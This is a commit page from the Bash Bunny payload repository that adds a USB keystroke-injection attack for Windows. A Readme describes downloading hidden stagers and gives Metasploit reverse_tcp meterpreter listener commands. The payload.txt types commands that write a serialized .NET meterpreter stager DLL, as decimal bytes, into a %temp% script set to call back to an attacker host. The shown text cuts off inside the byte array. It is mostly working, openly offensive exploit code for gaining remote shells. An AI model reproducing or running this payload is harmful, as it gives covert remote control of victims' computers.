hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Added JavaScript Reverse Meterpreter payload (#217)

Browse Source 
* Create JSRevMeter

* Update JSRevMeter

* Update JSRevMeter

* Update JSRevMeter

* Update JSRevMeter

* Update JSRevMeter

* Update JSRevMeter

* Update JSRevMeter

* Update JSRevMeter

final version before pull request

* Update JSRevMeter

* Update JSRevMeter

* Update JSRevMeter

had to chop up the shellcode so it would echo properly to file, overly long strings terminated premature

* Create Readme.md

* Update Readme.md

* Update Readme.md

* Update Readme.md

* Update Readme.md

* Update JSRevMeter

* Update Readme.md

* Update Readme.md

* Update Readme.md

* Rename JSRevMeter to payload.txt
This commit is contained in:
subinacls 2017-05-17 22:56:15 -06:00 committed by Sebastian Kinne
parent 9c527c29c4
commit a487d0a5db
2 changed files with 139 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
payloads/library/remote_access/Win_x64_JS_Rev_Meter/Readme.md Normal file
View File

@ -0,0 +1,63 @@
JavaScript Meterpreter Stager Win x86_64
(Author: SubINclS | Version: Version 0.1 | Target: Windows 10)
Description:
- Tested successful on Win10
- Modified from following like:
- https://github.com/Cn33liz/JSMeter/blob/master/JSMeter.js
- Run js on target machine, cscript JSMeter.js
- USB HID STORAGE Attck
- Attempts HTTP(s) download of Two (2) additional payloads.
- These files coinsist of:
- BB-Meterpreter-Winx64.js -> Actual bytecode of Meterpreter Stager payload
- inv.vbs -> creates hidden command terminal to execute commands
- Attempts to execute the malicious payload in an automated fashion from hidden cmd prompts
Script Logic:
- STAGE1():
- if payload does not exist on target:
- if inet connection:
- Attempts HTTPS connection to pastebin
- Grabs both payloads and save to %temp%
- else:
- Opens a cmd prompt, under current users context
- Echo contents to two files:
- BB-Meterpreter_winx64.js
- inv.vbs
- STAGE2():
- Executes hidden cmdshell via inv.vbs, launching payload
- STAGE3():
- Shutdown 0
Configuration:
- Listener:
- use exploit/multi/handler
- set PAYLOAD windows/(x64/|)meterpreter/reverse_tcp
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 0.0.0.0
- set LPORT 443
- set EnableUnicodeEncoding true
- set EnableStageEncoding true
- set ExitOnSession false
- exploit -j
- BashBunny:
- Edit JSRevMeter replacing the following:
- RHOST => Remote Listening Host
- RPORT => Remote Listening Port
- FILE1 => Payload file1 URL, ex: http://t.co/43rg67
- FILE2 => Payload file1 URL, ex: http://t.co/8ry8h0
- Upload monilithic script to your BB
Status:
- LED => Status/PHASE
- G => Power/INITILIZE
- Off => Init/MOUNTING
- G => Stage1/EXECUTING
- R => Stage2/EXECUTING
- B => Stage3/SHUTDOWN
- OFF => Remove Device from victim

76
payloads/library/remote_access/Win_x64_JS_Rev_Meter/payload.txt Normal file
View File

@ -0,0 +1,76 @@
REM Start exploit, going green
LED G
REM set attackmode to HID device
ATTACKMODE HID
REM set keyboard
DUCKY_LANG us
REM open run menu
Q GUI r
Q DELAY 1000
REM launch command shell, obvious for testing
Q STRING "cmd"
Q ENTER
REM Change IPADDR and PORT to match your system
Q STRING "echo var RHOST = 'CHANGEME'; > %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo var RPORT = '443'; >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo var serialized_obj = [0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,103,97,116,101,69,110,116,114,121,7,0,0,0,4,116,121,112,101,8,97,115,115,101,109,98,108,121,6,116,97,114,103,101,116,18,116,97,114,103,101,116,84,121,112,101,65,115,115,101,109,98,108,121,14,116,97,114,103,101,116,84,121,112,101,78,97,109,101,10,109,101,116,104,111,100,78,97,109,101,13,100,101,108,101,103,97,116,101,69,110,116,114,121,1,1,2,1,1,1,3,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,103,97,116,101,69,110,116,114,121,6,5,0,0,0,47,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,82,101,109,111,116,105,110,103,46,77,101,115,115,97,103,105,110,103,46,72,101,97,100,101,114,72,97,110,100,108,101,114,6,6,0,0,0,75,109,115,99,111,114,108,105,98,44,32,86,101,114,115,105,111,110,61,50,46,48,46,48,46,48,44,32,67,117,108,116,117,114,101,61,110,101,117,116,114,97,108,44,32,80,117,98,108,105,99,75,101,121,84,111,107,101,110,61,98,55,55,97,53,99,53,54,49,57,51,52,101,48,56,57,6,7,0,0,0,7,116,97,114,103,101,116,48,9,6,0,0,0,6,9,0,0,0,15,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,6,10,0,0,0,13,68,121,110,97,109,105,99,73,110,118,111,107,101,10,4,3,0,0,0,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,7,3,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,103,97,116,101,69,110,116,114,121,2,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,11,0,0,0,9,12,0,0,0,9,13,0,0,0,4,4,0,0,0,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,6,0,0,0,4,78,97,109,101,12, >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo 65,115,115,101,109,98,108,121,78,97,109,101,9,67,108,97,115,115,78,97,109,101,9,83,105,103,110,97,116,117,114,101,10,77,101,109,98,101,114,84,121,112,101,16,71,101,110,101,114,105,99,65,114,103,117,109,101,110,116,115,1,1,1,1,0,3,8,13,83,121,115,116,101,109,46,84,121,112,101,91,93,9,10,0,0,0,9,6,0,0,0,9,9,0,0,0,6,17,0,0,0,44,83,121,115,116,101,109,46,79,98,106,101,99,116,32,68,121,110,97,109,105,99,73,110,118,111,107,101,40,83,121,115,116,101,109,46,79,98,106,101,99,116,91,93,41,8,0,0,0,10,1,11,0,0,0,2,0,0,0,6,18,0,0,0,32,83,121,115,116,101,109,46,88,109,108,46,83,99,104,101,109,97,46,88,109,108,86,97,108,117,101,71,101,116,116,101,114,6,19,0,0,0,77,83,121,115,116,101,109,46,88,109,108,44,32,86,101,114,115,105,111,110,61,50,46,48,46,48,46,48,44,32,67,117,108,116,117,114,101,61,110,101,117,116,114,97,108,44,32,80,117,98,108,105,99,75,101,121,84,111,107,101,110,61,98,55,55,97,53,99,53,54,49,57,51,52,101,48,56,57,6,20,0,0,0,7,116,97,114,103,101,116,48,9,6,0,0,0,6,22,0,0,0,26,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,6,23,0,0,0,4,76,111,97,100,10,15,12,0,0,0,0,28,0,0,2,77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184,0,0,0,0,0,0,0,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36,0,0,0,0,0,0,0,80,69,0,0,76,1,3,0,153,94,21,89,0,0,0,0,0,0,0,0,224,0,34,32,11,1,48,0,0,20,0,0,0,6,0,0,0,0,0,0,6,51,0,0,0,32,0,0,0,64,0,0,0,0,0,16,0,32,0,0,0,2,0,0,4,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,128,0,0,0,2,0,0,0,0,0,0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16,0,0,0,0,0,0,0,0,0,0,0,180,50,0,0,79,0,0,0,0,64,0,0,216,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,96,0,0,12,0,0,0,124,49,0,0,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,8,0,0,0,0,0,0,0,0,0,0,0,8,32,0,0,72,0,0,0,0,0,0,0,0,0,0,0,46,116,101,120,116,0,0,0,12,19,0,0,0,32,0,0,0,20,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,96,46,114,115,114,99,0,0,0,216,3,0,0,0,64,0,0,0,4,0,0,0,22,0,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,64,46,114,101,108,111,99,0,0,12,0,0,0,0,96,0,0,0,2,0,0,0,26,0,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,66,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,232,50,0,0,0,0,0,0,72,0,0,0,2,0,5,0,184,34,0,0,196,14,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,19,48,7,0,84,2,0,0,1,0,0,17,22,10,32,0,16,0,0,11,32,0,32,0,0,12,31,64,13,126,16,0,0,10,38,126,16,0,0,10,19,4,22,19,5,126,1,0,0,4,45,57,18,17,254,21,3,0,0,2,32,2,2,0,0,18,17,40,1,0,0,6,44,2,22,42,208,26,0,0,1,40,17,0,0,10,114,1,0,0,112,31,36,111,18,0,0,10,128,2,0,0,4,23,128,1,0,0,4,3,18,6,40,19,0,0,10,45,2,22,42,4,22,50,8,4,32,255,255,0,0,49,2,22,42,17,6,4,115,20,0,0,10,19,7,17,7,111,21,0,0,10,19,8,24,23,28,126,16,0,0,10,22,22,40,2,0,0,6,19,9,17,9,21,115,22,0,0,10,40,23,0,0,10,44, >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo 2,22,42,31,64,24,17,7,111,24,0,0,10,111,25,0,0,10,17,7,111,26,0,0,10,115,27,0,0,10,40,28,0,0,10,126,2,0,0,4,17,8,111,29,0,0,10,116,1,0,0,27,19,10,17,9,17,10,17,8,111,30,0,0,10,126,16,0,0,10,126,16,0,0,10,126,16,0,0,10,126,16,0,0,10,40,3,0,0,6,22,254,1,19,11,17,11,45,10,17,9,40,5,0,0,6,38,22,42,30,40,31,0,0,10,19,12,17,12,30,40,6,0,0,6,17,9,17,12,26,22,40,4,0,0,6,38,17,12,40,32,0,0,10,40,33,0,0,10,10,17,12,40,34,0,0,10,27,19,13,40,35,0,0,10,30,51,4,31,10,19,13,6,17,13,88,141,38,0,0,1,19,14,40,35,0,0,10,30,51,17,17,14,22,31,72,156,17,14,23,32,191,0,0,0,156,43,9,17,14,22,32,191,0,0,0,156,23,19,18,17,9,40,33,0,0,10,40,36,0,0,10,19,19,40,35,0,0,10,30,51,3,24,19,18,22,19,22,43,19,17,14,17,22,17,18,88,17,19,17,22,145,156,17,22,23,88,19,22,17,22,26,50,232,6,40,31,0,0,10,19,20,17,20,6,40,6,0,0,6,22,19,21,43,13,17,9,17,20,6,22,40,4,0,0,6,19,21,17,21,6,50,238,22,19,23,43,23,17,14,17,23,17,13,88,17,20,17,23,40,37,0,0,10,156,17,23,23,88,19,23,17,23,6,50,228,17,20,40,34,0,0,10,7,8,96,19,15,126,16,0,0,10,17,14,142,105,17,15,9,40,7,0,0,6,19,16,17,14,22,17,16,17,14,142,105,40,38,0,0,10,22,22,17,16,17,4,22,18,5,40,8,0,0,6,21,40,9,0,0,6,38,17,9,40,5,0,0,6,38,17,11,42,30,2,40,39,0,0,10,42,66,83,74,66,1,0,1,0,0,0,0,0,12,0,0,0,118,50,46,48,46,53,48,55,50,55,0,0,0,0,5,0,108,0,0,0,0,5,0,0,35,126,0,0,108,5,0,0,196,6,0,0,35,83,116,114,105,110,103,115,0,0,0,0,48,12,0,0,20,0,0,0,35,85,83,0,68,12,0,0,16,0,0,0,35,71,85,73,68,0,0,0,84,12,0,0,112,2,0,0,35,66,108,111,98,0,0,0,0,0,0,0,2,0,0,1,87,85,2,28,9,2,0,0,0,250,1,51,0,22,0,0,1,0,0,0,39,0,0,0,3,0,0,0,9,0,0,0,11,0,0,0,36,0,0,0,39,0,0,0,15,0,0,0,1,0,0,0,1,0,0,0,3,0,0,0,1,0,0,0,9,0,0,0,1,0,0,0,2,0,0,0,1,0,0,0,0,0,92,3,1,0,0,0,0,0,6,0,43,2,200,4,6,0,152,2,200,4,6,0,92,1,135,4,15,0,232,4,0,0,6,0,132,1,203,3,6,0,14,2,203,3,6,0,239,1,203,3,6,0,127,2,203,3,6,0,75,2,203,3,6,0,100,2,203,3,6,0,155,1,203,3,6,0,112,1,169,4,6,0,52,1,169,4,6,0,182,1,203,3,6,0,188,3,78,5,6,0,211,1,78,5,6,0,66,1,177,6,6,0,254,5,118,3,6,0,244,3,203,3,10,0,118,6,195,5,10,0,7,1,195,5,10,0,220,0,195,5,10,0,48,5,195,5,10,0,120,5,37,6,10,0,82,6,37,6,10,0,152,5,37,6,6,0,210,0,118,3,6,0,128,4,118,3,6,0,38,1,118,3,6,0,153,0,118,3,6,0,19,5,203,3,10,0,84,6,37,6,10,0,159,3,37,6,10,0,106,5,37,6,10,0,29,1,37,6,6,0,138,3,177,6,6,0,60,3,169,4,6,0,186,2,118,3,6,0,105,4,118,3,0,0,0,0,10,0,0,0,0,0,1,0,1,0,1,0,16,0,93,4,0,0,73,0,1,0,1,0,10,1,16,0,53,0,0,0,109,0,3,0,12,0,17,0,125,0,101,1,17,0,46,4,104,1,6,0,235,3,108,1,6,0,125,3,108,1,6,0,221,3,111,1,6,0,226,5,111,1,6,0,214,5,108,1,6,0,0,3,108,1,6,0,11,4,66,0,0,0,0,0,128,0,147,32,35,4,114,1,1,0,0,0,0,0,128,0,147,32,48,6,122,1,3,0,0,0,0,0,128,0,147,32,5,6,135,1,9,0,0,0,0,0,128,0,145,32,113,6,147,1,16,0,0,0,0,0,128,0,150,32,58,6,153,0,20,0,0,0,0,0,128,0,145,32,151,6,156,1,21,0,0,0,0,0,128,0,145,32,70,0,162,1,23,0,0,0,0,0,128,0,145,32,94,0,170,1,27,0,0,0,0,0,128,0,145,32,241,5,181,1,33,0,80,32,0,0,0,0,134,0,16,6,187,1,35,0,176,34,0,0,0,0,134,24,118,4,6,0,37,0,1,0,1,0,107,0,2,0,2,0,51,0,1,0,1,0,132,6,1,0,2,0,18,1,1,0,3,0,233,0,1,0, >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo 4,0,254,3,1,0,5,0,29,4,1,0,6,0,72,5,1,0,1,0,197,0,1,0,2,0,166,5,1,0,3,0,221,2,1,0,4,0,55,4,1,0,5,0,64,4,1,0,6,0,46,0,1,0,7,0,41,0,1,0,1,0,197,0,1,0,2,0,74,4,1,0,3,0,93,6,1,0,4,0,60,5,1,0,1,0,197,0,0,0,1,0,176,3,0,0,2,0,28,3,0,0,1,0,142,5,0,0,2,0,239,2,0,0,3,0,246,0,0,0,4,0,27,6,0,0,1,0,247,4,0,0,2,0,209,2,0,0,3,0,180,5,0,0,4,0,81,4,0,0,5,0,32,5,0,0,6,0,83,0,1,0,1,0,171,0,1,0,2,0,154,4,0,0,1,0,19,3,0,0,2,0,108,6,9,0,118,4,1,0,17,0,118,4,6,0,25,0,118,4,10,0,41,0,118,4,16,0,49,0,118,4,16,0,57,0,118,4,16,0,65,0,118,4,16,0,73,0,118,4,16,0,81,0,118,4,16,0,89,0,118,4,16,0,97,0,118,4,21,0,105,0,118,4,16,0,113,0,118,4,16,0,129,0,118,4,26,0,137,0,118,4,6,0,225,0,24,4,66,0,233,0,179,0,69,0,233,0,137,0,76,0,193,0,43,1,84,0,201,0,118,4,92,0,1,1,246,2,99,0,225,0,118,4,1,0,225,0,165,6,104,0,201,0,130,5,110,0,145,0,10,3,115,0,201,0,99,6,119,0,9,1,118,4,123,0,33,1,146,0,6,0,153,0,191,2,135,0,209,0,200,2,119,0,41,1,35,3,143,0,41,1,124,4,148,0,225,0,70,6,153,0,41,1,48,3,158,0,225,0,200,2,163,0,57,1,10,5,167,0,41,1,182,2,173,0,41,1,146,6,179,0,145,0,118,4,6,0,39,0,123,0,104,2,46,0,11,0,193,1,46,0,19,0,202,1,46,0,27,0,233,1,46,0,35,0,242,1,46,0,43,0,13,2,46,0,51,0,13,2,46,0,59,0,13,2,46,0,67,0,242,1,46,0,75,0,19,2,46,0,83,0,13,2,46,0,91,0,13,2,46,0,99,0,43,2,46,0,107,0,85,2,67,0,91,0,98,2,8,0,6,0,197,0,32,0,68,3,79,3,1,0,140,0,98,17,3,0,35,4,1,0,68,1,5,0,48,6,1,0,64,1,7,0,5,6,1,0,0,1,9,0,113,6,1,0,68,1,11,0,58,6,1,0,0,1,13,0,151,6,2,0,0,1,15,0,70,0,3,0,0,1,17,0,94,0,3,0,0,1,19,0,241,5,3,0,4,128,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,19,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,188,0,61,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,188,0,118,3,0,0,0,0,3,0,2,0,0,0,0,0,0,107,101,114,110,101,108,51,50,0,60,77,111,100,117,108,101,62,0,67,83,104,97,114,112,45,77,101,116,101,114,112,114,101,116,101,114,68,76,76,0,103,81,79,83,0,115,81,79,83,0,108,112,87,83,65,68,97,116,97,0,109,115,99,111,114,108,105,98,0,86,105,114,116,117,97,108,65,108,108,111,99,0,108,112,84,104,114,101,97,100,73,100,0,67,114,101,97,116,101,84,104,114,101,97,100,0,119,86,101,114,115,105,111,110,82,101,113,117,101,115,116,101,100,0,73,110,105,116,105,97,108,105,122,101,100,0,71,101,116,70,105,101,108,100,0,68,101,109,97,110,100,0,82,117,110,116,105,109,101,84,121,112,101,72,97,110,100,108,101,0,104,72,97,110,100,108,101,0,71,101,116,84,121,112,101,70,114,111,109,72,97,110,100,108,101,0,115,111,99,107,101,116,72,97,110,100,108,101,0,86,97,108,117,101,84,121,112,101,0,80,114,111,116,111,99,111,108,84,121,112,101,0,112,114,111,116,111,99,111,108,84,121,112,101,0,102,108,65,108,108,111,99,97,116,105,111,110,84,121,112,101,0,83,111,99,107,101,116,84,121,112,101,0,115,111,99,107,101,116,84,121,112,101,0,84,114,97,110,115,112,111,114,116,84,121,112,101,0,84,114,121,80,97,114,115,101,0,71,117,105,100,65,116,116,114,105,98,117,116,101,0,85,110,118,101,114,105,102,105,97,98,108,101,67,111,100,101,65,116,116,114,105,98,117,116,101,0,68,101,98,117,103,103,97,98,108,101,65,116,116,114,105,98,117,116,101,0,67,111,109,86,105,115,105,98,108,101,65,116, >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo 116,114,105,98,117,116,101,0,65,115,115,101,109,98,108,121,84,105,116,108,101,65,116,116,114,105,98,117,116,101,0,65,115,115,101,109,98,108,121,84,114,97,100,101,109,97,114,107,65,116,116,114,105,98,117,116,101,0,65,115,115,101,109,98,108,121,70,105,108,101,86,101,114,115,105,111,110,65,116,116,114,105,98,117,116,101,0,83,101,99,117,114,105,116,121,80,101,114,109,105,115,115,105,111,110,65,116,116,114,105,98,117,116,101,0,65,115,115,101,109,98,108,121,67,111,110,102,105,103,117,114,97,116,105,111,110,65,116,116,114,105,98,117,116,101,0,65,115,115,101,109,98,108,121,68,101,115,99,114,105,112,116,105,111,110,65,116,116,114,105,98,117,116,101,0,67,111,109,112,105,108,97,116,105,111,110,82,101,108,97,120,97,116,105,111,110,115,65,116,116,114,105,98,117,116,101,0,65,115,115,101,109,98,108,121,80,114,111,100,117,99,116,65,116,116,114,105,98,117,116,101,0,65,115,115,101,109,98,108,121,67,111,112,121,114,105,103,104,116,65,116,116,114,105,98,117,116,101,0,65,115,115,101,109,98,108,121,67,111,109,112,97,110,121,65,116,116,114,105,98,117,116,101,0,82,117,110,116,105,109,101,67,111,109,112,97,116,105,98,105,108,105,116,121,65,116,116,114,105,98,117,116,101,0,82,101,97,100,66,121,116,101,0,71,101,116,86,97,108,117,101,0,103,101,116,95,83,105,122,101,0,100,119,83,116,97,99,107,83,105,122,101,0,115,111,99,107,101,116,65,100,100,114,101,115,115,83,105,122,101,0,100,119,83,105,122,101,0,83,101,114,105,97,108,105,122,101,0,105,77,97,120,85,100,112,68,103,0,84,111,83,116,114,105,110,103,0,105,112,83,116,114,105,110,103,0,108,101,110,103,116,104,0,65,108,108,111,99,72,71,108,111,98,97,108,0,70,114,101,101,72,71,108,111,98,97,108,0,77,97,114,115,104,97,108,0,119,115,50,95,51,50,46,100,108,108,0,107,101,114,110,101,108,51,50,46,100,108,108,0,67,83,104,97,114,112,45,77,101,116,101,114,112,114,101,116,101,114,68,76,76,46,100,108,108,0,83,121,115,116,101,109,0,119,72,105,103,104,86,101,114,115,105,111,110,0,67,111,100,101,65,99,99,101,115,115,80,101,114,109,105,115,115,105,111,110,0,83,111,99,107,101,116,80,101,114,109,105,115,115,105,111,110,0,68,101,115,116,105,110,97,116,105,111,110,0,83,101,99,117,114,105,116,121,65,99,116,105,111,110,0,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,0,115,122,68,101,115,99,114,105,112,116,105,111,110,0,119,86,101,115,116,105,111,110,0,70,105,101,108,100,73,110,102,111,0,112,114,111,116,111,99,111,108,73,110,102,111,0,108,112,86,101,110,100,111,114,73,110,102,111,0,90,101,114,111,0,103,114,111,117,112,0,87,83,65,83,116,97,114,116,117,112,0,109,95,66,117,102,102,101,114,0,105,110,66,117,102,102,101,114,0,111,117,116,66,117,102,102,101,114,0,98,117,102,102,101,114,0,108,112,80,97,114,97,109,101,116,101,114,0,77,101,116,101,114,80,114,101,116,101,114,0,66,105,116,67,111,110,118,101,114,116,101,114,0,46,99,116,111,114,0,82,101,97,100,73,110,116,80,116,114,0,83,121,115,116,101,109,46,68,105,97,103,110,111,115,116,105,99,115,0,100,119,77,105,108,108,105,115,101,99,111,110,100,115,0,83,121,115,116,101,109,46,82,117,110,116, >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo 105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,0,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,67,111,109,112,105,108,101,114,83,101,114,118,105,99,101,115,0,68,101,98,117,103,103,105,110,103,77,111,100,101,115,0,108,112,84,104,114,101,97,100,65,116,116,114,105,98,117,116,101,115,0,71,101,116,66,121,116,101,115,0,66,105,110,100,105,110,103,70,108,97,103,115,0,100,119,67,114,101,97,116,105,111,110,70,108,97,103,115,0,83,111,99,107,101,116,70,108,97,103,115,0,115,111,99,107,101,116,70,108,97,103,115,0,102,108,97,103,115,0,83,121,115,116,101,109,46,83,101,99,117,114,105,116,121,46,80,101,114,109,105,115,115,105,111,110,115,0,78,101,116,119,111,114,107,65,99,99,101,115,115,0,73,80,65,100,100,114,101,115,115,0,103,101,116,95,65,100,100,114,101,115,115,0,108,112,65,100,100,114,101,115,115,0,83,111,99,107,101,116,65,100,100,114,101,115,115,0,115,111,99,107,101,116,65,100,100,114,101,115,115,0,108,112,83,116,97,114,116,65,100,100,114,101,115,115,0,83,121,115,116,101,109,46,78,101,116,46,83,111,99,107,101,116,115,0,105,77,97,120,83,111,99,107,101,116,115,0,115,122,83,121,115,116,101,109,83,116,97,116,117,115,0,87,97,105,116,70,111,114,83,105,110,103,108,101,79,98,106,101,99,116,0,87,83,65,67,111,110,110,101,99,116,0,77,83,70,67,111,110,110,101,99,116,0,102,108,80,114,111,116,101,99,116,0,83,121,115,116,101,109,46,78,101,116,0,87,83,65,83,111,99,107,101,116,0,99,108,111,115,101,115,111,99,107,101,116,0,111,112,95,69,120,112,108,105,99,105,116,0,73,80,69,110,100,80,111,105,110,116,0,99,111,117,110,116,0,103,101,116,95,80,111,114,116,0,112,111,114,116,0,114,101,99,118,0,65,100,100,114,101,115,115,70,97,109,105,108,121,0,97,100,100,114,101,115,115,70,97,109,105,108,121,0,67,111,112,121,0,82,116,108,90,101,114,111,77,101,109,111,114,121,0,111,112,95,69,113,117,97,108,105,116,121,0,83,121,115,116,101,109,46,83,101,99,117,114,105,116,121,0,0,0,0,0,17,109,0,95,0,66,0,117,0,102,0,102,0,101,0,114,0,0,0,192,88,72,227,229,223,252,74,182,31,166,132,192,72,245,208,0,4,32,1,1,8,3,32,0,1,5,32,1,1,17,17,4,32,1,1,14,4,32,1,1,2,5,32,1,1,17,61,33,7,24,8,9,9,9,24,9,18,97,18,101,18,105,24,29,5,2,24,8,29,5,9,24,17,12,8,29,5,24,8,8,8,2,6,24,6,0,1,18,117,17,121,7,32,2,18,77,14,17,125,7,0,2,2,14,16,18,97,6,32,2,1,18,97,8,4,32,0,18,105,5,0,2,2,24,24,4,32,0,18,97,3,32,0,14,3,32,0,8,11,32,4,1,17,128,137,17,128,141,14,8,4,32,1,28,28,2,29,5,4,0,1,24,8,4,0,1,24,24,4,0,1,8,24,4,0,1,1,24,3,0,0,8,5,0,1,29,5,8,5,0,2,5,24,8,8,0,4,1,29,5,8,24,8,8,183,122,92,86,25,52,224,137,128,158,46,1,128,132,83,121,115,116,101,109,46,83,101,99,117,114,105,116,121,46,80,101,114,109,105,115,115,105,111,110,115,46,83,101,99,117,114,105,116,121,80,101,114,109,105,115,115,105,111,110,65,116,116,114,105,98,117,116,101,44,32,109,115,99,111,114,108,105,98,44,32,86,101,114,115,105,111,110,61,50,46,48,46,48,46,48,44,32,67,117,108,116,117,114,101,61,110,101,117,116,114,97,108,44,32,80,117,98,108,105,99,75,101,121,84,111,107,101,110,61,98,55,55,97,53,99,53,54,49,57,51,52,101,48,56, >> %temp%\BB-Metasploit-Winx64.js"
Q ENTER
Q STRING "echo 57,21,1,84,2,16,83,107,105,112,86,101,114,105,102,105,99,97,116,105,111,110,1,2,6,2,3,6,18,77,2,6,6,2,6,5,7,0,2,8,6,16,17,12,12,0,6,24,17,81,17,85,17,89,24,9,8,11,0,7,8,24,29,5,8,24,24,24,24,8,0,4,8,24,24,8,17,93,5,0,2,1,24,8,7,0,4,24,24,9,9,9,10,0,6,24,9,9,24,24,9,16,9,5,0,2,9,24,9,5,32,2,2,14,8,8,1,0,8,0,0,0,0,0,30,1,0,1,0,84,2,22,87,114,97,112,78,111,110,69,120,99,101,112,116,105,111,110,84,104,114,111,119,115,1,8,1,0,2,0,0,0,0,0,26,1,0,21,67,83,104,97,114,112,45,77,101,116,101,114,112,114,101,116,101,114,68,76,76,0,0,5,1,0,0,0,0,23,1,0,18,67,111,112,121,114,105,103,104,116,32,194,169,32,32,50,48,49,55,0,0,41,1,0,36,48,54,54,54,57,99,54,101,45,98,98,102,51,45,52,54,97,98,45,56,99,54,101,45,52,51,54,50,100,48,98,97,98,101,52,97,0,0,12,1,0,7,49,46,48,46,48,46,48,0,0,5,1,0,1,0,0,4,1,0,0,0,0,0,0,0,0,0,0,153,94,21,89,0,0,0,0,2,0,0,0,28,1,0,0,152,49,0,0,152,19,0,0,82,83,68,83,26,217,109,60,138,68,90,68,169,65,114,140,146,212,114,153,1,0,0,0,67,58,92,68,101,118,101,108,111,112,109,101,110,116,92,67,83,104,97,114,112,45,77,101,116,101,114,112,114,101,116,101,114,68,76,76,92,67,83,104,97,114,112,45,77,101,116,101,114,112,114,101,116,101,114,68,76,76,92,111,98,106,92,82,101,108,101,97,115,101,92,67,83,104,97,114,112,45,77,101,116,101,114,112,114,101,116,101,114,68,76,76,46,112,100,98,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,